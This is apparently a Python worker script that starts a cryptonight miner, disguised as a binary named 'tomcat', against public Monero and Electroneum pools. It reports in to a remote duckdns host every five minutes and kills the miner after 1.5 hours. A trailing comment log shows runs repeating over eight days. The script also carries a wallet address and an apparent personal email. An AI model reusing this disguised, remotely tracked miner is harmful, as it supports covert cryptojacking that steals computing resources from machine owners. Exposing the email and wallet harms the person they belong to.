import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:05.024035
#2018-02-17 16:57:03.305830
#2018-02-17 18:46:01.910539
#2018-02-17 20:33:05.776737
#2018-02-17 22:19:07.255117
#2018-02-18 00:03:07.756537
#2018-02-18 01:54:03.391269
#2018-02-18 03:42:04.811272
#2018-02-18 05:29:04.333601
#2018-02-18 07:21:04.255152
#2018-02-18 09:09:03.865688
#2018-02-18 10:55:03.299363
#2018-02-18 12:41:01.582775
#2018-02-18 14:27:07.945441
#2018-02-18 16:17:05.984303
#2018-02-18 18:07:01.605471
#2018-02-18 19:53:04.014604
#2018-02-18 21:40:01.438657
#2018-02-18 23:28:06.246425
#2018-02-19 01:15:05.732494
#2018-02-19 03:03:07.395526
#2018-02-19 04:49:04.349059
#2018-02-19 06:33:06.514333
#2018-02-19 08:21:07.213207
#2018-02-19 10:11:04.408739
#2018-02-19 11:58:08.754604
#2018-02-19 13:45:04.879875
#2018-02-19 15:33:04.199874
#2018-02-19 17:20:04.524808
#2018-02-19 19:09:06.347643
#2018-02-19 20:56:06.244426
#2018-02-19 22:44:08.087960
#2018-02-20 00:28:08.604490
#2018-02-20 02:16:01.618092
#2018-02-20 04:06:07.217743
#2018-02-20 05:49:01.887682
#2018-02-20 07:35:04.675786
#2018-02-20 09:20:04.992755
#2018-02-20 11:04:05.100898
#2018-02-20 12:50:08.020227
#2018-02-20 14:35:06.485758
#2018-02-20 16:20:13.722853
#2018-02-20 18:08:09.407850
#2018-02-20 20:01:05.980564
#2018-02-20 21:48:01.373183
#2018-02-20 23:29:08.161991
#2018-02-21 01:13:07.620796
#2018-02-21 02:59:05.832198
#2018-02-21 04:47:04.874947
#2018-02-21 06:35:07.456076
#2018-02-21 08:22:06.941574
#2018-02-21 10:07:05.671156
#2018-02-21 11:54:02.066433
#2018-02-21 13:45:01.444900
#2018-02-21 15:31:11.454917
#2018-02-21 17:22:07.187374
#2018-02-21 19:11:04.432928
#2018-02-21 20:58:07.427830
#2018-02-21 22:44:06.056526
#2018-02-22 00:34:04.641534
#2018-02-22 02:21:05.747369
#2018-02-22 04:08:03.756554
#2018-02-22 05:53:01.709159
#2018-02-22 07:39:06.657055
#2018-02-22 09:27:07.442997
#2018-02-22 11:13:05.946792
#2018-02-22 12:59:04.721276
#2018-02-22 14:46:08.996340
#2018-02-22 16:32:08.183168
#2018-02-22 18:18:06.051982
#2018-02-22 20:11:08.678928
#2018-02-22 21:58:02.065772
#2018-02-22 23:45:07.418889
#2018-02-23 01:32:09.107632
#2018-02-23 03:18:01.359748
#2018-02-23 05:06:04.160585
#2018-02-23 06:51:02.196521
#2018-02-23 08:42:05.405791
#2018-02-23 10:58:05.783843
#2018-02-23 12:55:01.620060
#2018-02-23 14:39:07.618302
#2018-02-23 16:29:06.361460
#2018-02-23 18:15:02.949924
#2018-02-23 20:01:01.298823
#2018-02-23 21:45:07.986286
#2018-02-23 23:38:08.914719
#2018-02-24 01:28:05.016553
#2018-02-24 03:19:06.405230
#2018-02-24 05:04:07.362832
#2018-02-24 06:54:01.876072
#2018-02-24 08:45:09.137778
#2018-02-24 10:41:01.922789
#2018-02-24 12:33:01.736603
#2018-02-24 14:21:07.428377
#2018-02-24 16:11:02.043644
#2018-02-24 18:02:06.050530
#2018-02-24 19:49:05.505253
#2018-02-24 21:34:04.187530
#2018-02-25 00:21:06.021816
#2018-02-25 03:28:05.209089
#2018-02-25 06:19:07.259836
#2018-02-25 11:34:01.788825
#2018-02-25 13:10:01.187354
#2018-02-25 14:43:01.295761
#2018-02-25 16:16:01.825958